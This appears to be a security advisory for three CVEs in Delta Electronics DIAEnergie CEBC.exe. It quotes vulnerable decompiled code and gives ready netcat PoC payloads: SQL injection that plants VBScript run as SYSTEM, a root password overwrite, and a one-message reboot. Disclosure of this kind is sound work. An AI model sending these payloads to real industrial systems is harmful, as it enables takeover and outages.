Multiple vulnerabilities exist in Delta Electronics DIAEnergie CEBC.exe v1.10.1.8610.
CVE-2024-4547 - RecalculateScript Unauthenticated SQLi (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CEBC.exe listens on TCP port 928 and processes messages received on that port without authenticating the sender.
An SQLi vulnerability exists when CEBC.exe processes a 'RecalculateScript' message, which is split into 4 fields using the '~' character as the separator. The second and third fields are passed through Convert.ToDateTime, but the fourth field is concatenated verbatim into the IN clause of an UPDATE statement executed against DIAE_tag, so an unauthenticated remote attacker can perform SQLi via the fourth field:
[...]
if (@string.StartsWith("RecalculateScript"))
{
string[] array7 = @string.Split(new char[] { '~' });
if (array7.Length != 4)
{
string text21 = "Command Error!" + DateTime.Now.ToString();
byte[] bytes25 = Encoding.ASCII.GetBytes(text21);
this.socket_1.Send(bytes25, bytes25.Length, SocketFlags.None);
goto IL_F0C;
}
try
{
RecalculateScriptClass recalculateScriptClass = new RecalculateScriptClass();
recalculateScriptClass.timeStart = Convert.ToDateTime(array7[1]);
recalculateScriptClass.timeEnd = Convert.ToDateTime(array7[2]);
recalculateScriptClass.tidList = array7[3].Split(new char[] { ',' });
diaenergieSQLHandleClass.ExcuteSQL("UPDATE DIAE_tag SET recalculate=2 WHERE tid IN (" + array7[3] + ")");
new Thread(new ThreadStart(recalculateScriptClass.RecalculateScript))
{
IsBackground = true
}.Start();
[...]
PoC:
// 1. Insert VBScript code into the DIAE_script table and execute it as SYSTEM
// Use a different script name for more insertions
echo -n "RecalculateScript~2024-01-01 00:00:00~2024-01-02 00:00:00~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'run_cmd', N'CreateObject(\"WScript.shell\").run(\"notepad.exe\")', N'1', N'');--" | nc <target-host> 928
// 2. Change DIAEnergie root password to 'password123' (without quotes)
echo -n "RecalculateScript~2024-01-01 00:00:00~2024-01-02 00:00:00~1); UPDATE DIAEnergie.dbo.DIAE_us SET pw=N'exJ/3E15SkSjem/EOj/JubyAEzX5F5zrBVKdPff2C9I=' WHERE uid=1;--" | nc <target-host> 928
CVE-2024-4548 - RecalculateHDMWYC Unauthenticated SQLi (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
An SQLi vulnerability exists when CEBC.exe processes a 'RecalculateHDMWYC' message, which is split into 4 fields using the '~' character as the separator. The fourth field is split on ',' and then re-joined unchanged into the IN clause of a SELECT on DIAE_data (in method_1 of Class8, shown below), so an unauthenticated remote attacker can perform SQLi via the fourth field:
[...]
if (@string.StartsWith("RecalculateHDMWYC"))
{
string[] array4 = @string.Split(new char[] { '~' });
if (array4.Length != 4)
{
string text14 = "Command Error!" + DateTime.Now.ToString();
byte[] bytes19 = Encoding.ASCII.GetBytes(text14);
this.socket_1.Send(bytes19, bytes19.Length, SocketFlags.None);
goto IL_F0C;
}
try
{
Class8 @class = new Class8();
@class.dataTable_0 = diaenergieSQLHandleClass.GetDataTable("SELECT t.sc,u.en,t.tid,t.it,t.reg,t.tp,t.su,t.tbid FROM DIAE_tag AS t LEFT JOIN DIAE_un AS u ON t.un=u.unm WHERE t.del='0' AND t.re='1'", new string[0]);
@class.method_1(Convert.ToDateTime(array4[1]), Convert.ToDateTime(array4[2]), array4[3].Split(new char[]
[...]
// method of Class8
public void method_1(DateTime dateTime_1, DateTime dateTime_2, string[] string_0, bool bool_0 = false)
{
DIAEnergieSQLHandleClass diaenergieSQLHandleClass = new DIAEnergieSQLHandleClass(Define.localhostSQLClientConnectString);
Stopwatch stopwatch = new Stopwatch();
stopwatch.Restart();
try
{
Class8.logger_0.Debug<string, string, string>("Start RecalculateHDMWYC timeStart:{0} timeEnd:{1} tidList:{2}", dateTime_1.ToString("yyyy-MM-dd HH:mm:ss"), dateTime_2.ToString("yyyy-MM-dd HH:mm:ss"), string.Join(",", string_0));
DataTable dataTable = diaenergieSQLHandleClass.GetDataTable("SELECT * FROM DIAE_shift", new string[0]);
DataTable dataTable2 = diaenergieSQLHandleClass.GetDataTable("SELECT TOP 0 kid,ts,tid,result FROM DIAE_data", new string[0]).Clone();
DataTable dataTable3 = diaenergieSQLHandleClass.GetDataTable("SELECT ts,tid,result FROM DIAE_data WHERE ts>='{0}' AND ts<='{1}' AND tid IN ({2})", new string[]
{
dateTime_1.ToString("yyyy-MM-dd HH:mm:00"),
dateTime_2.AddMinutes((double)Define.RecordIdleMinutes).ToString("yyyy-MM-dd HH:mm:00"),
string.Join(",", string_0)
});
[...]
PoC:
// 1.a Insert VBScript code into the DIAE_script table
// Use a different script name for more insertions
echo -n "RecalculateHDMWYC~2024-01-01 00:00:00~2024-01-02 00:00:00~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'run_cmd', N'CreateObject(\"WScript.shell\").run(\"notepad.exe\")', N'1', N'');--" | nc <target-host> 928
// 1.b Execute the VBScript code as SYSTEM
echo -n "RecalculateScript~2024-01-01 00:00:00~2024-01-02 00:00:00~1" | nc <target-host> 928
// 2. Change DIAEnergie root password to 'attacker' (without quotes)
echo -n "RecalculateHDMWYC~2024-01-01 00:00:00~2024-01-02 00:00:00~1); UPDATE DIAEnergie.dbo.DIAE_us SET pw=N'uV5SW+n71LS/S/Bjd426N1hNF1r70booEbICe8yhAxc=' WHERE uid=1;--" | nc <target-host> 928
CVE-2024-4549 - Unauthenticated DoS (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H)
When it receives a message that exactly matches 'ICS Restart!', CEBC.exe launches shutdown.exe with a one-second timeout to reboot the host, so a single unauthenticated message takes the whole machine offline:
[...]
else if (@string == "ICS Restart!")
{
Process.Start(new ProcessStartInfo
{
FileName = "shutdown.exe",
Arguments = "-r -t 1"
});
[...]
PoC:
echo -n 'ICS Restart!' | nc <target-host> 928